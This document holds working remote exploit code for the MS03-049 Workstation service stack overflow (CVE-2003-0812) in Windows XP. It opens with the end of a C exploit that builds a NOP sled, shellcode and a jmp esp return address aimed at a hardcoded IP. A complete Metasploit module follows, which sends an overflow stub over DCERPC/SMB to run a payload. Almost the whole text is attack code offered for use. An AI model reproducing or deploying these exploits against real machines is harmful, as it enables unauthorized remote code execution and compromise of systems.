"NetValidateName"); // up to you tocheck NetAddAlternateComputerName if (procAddress == NULL) { fprintf(stderr, "[-] GetProcAddress failed\n"); return 1; } memset(szBuffer, 0x90, sizeof(szBuffer)); memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1); // ebp @ &szBuffer[2013] *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, useopcode search engine for more, but // be aware that a call esp willchange the offset in the stack) memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0); WNetCancelConnection2("\\\\192.168.175.3\\ipc$", 0, TRUE); FreeLibrary(hInstance); return 0; } // milw0rm.com [2003-11-12]

## # $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Workstation Service NetAddAlternateComputerName Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2003-0812' ], [ 'OSVDB', '11461' ], [ 'BID', '9011' ], [ 'MSB', 'MS03-049' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'), 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, 'Targets' => [ [ 'Windows XP SP0/SP1', { 'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll } ], ], 'DisclosureDate' => 'Nov 11 2003')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']), ], self.class) end def exploit connect() smb_login() handle = dcerpc_handle( '6bffd098-a112-3610-9833-46c3f87e345a', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status("Building the stub data...") name = rand_text_alphanumeric(5000) name[3496, 4] = [target.ret].pack('V') name[3492, 2] = "\xeb\x06" name[3500, 5] = "\xe9" + [-3505].pack('V') name[0, payload.encoded.length] = payload.encoded stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString(name) + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.long(0) + NDR.long(0) print_status("Calling the vulnerable function...") begin dcerpc.call(0x1b, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse rescue => e if e.to_s !~ /STATUS_PIPE_DISCONNECTED/ raise e end end # Cleanup handler disconnect end end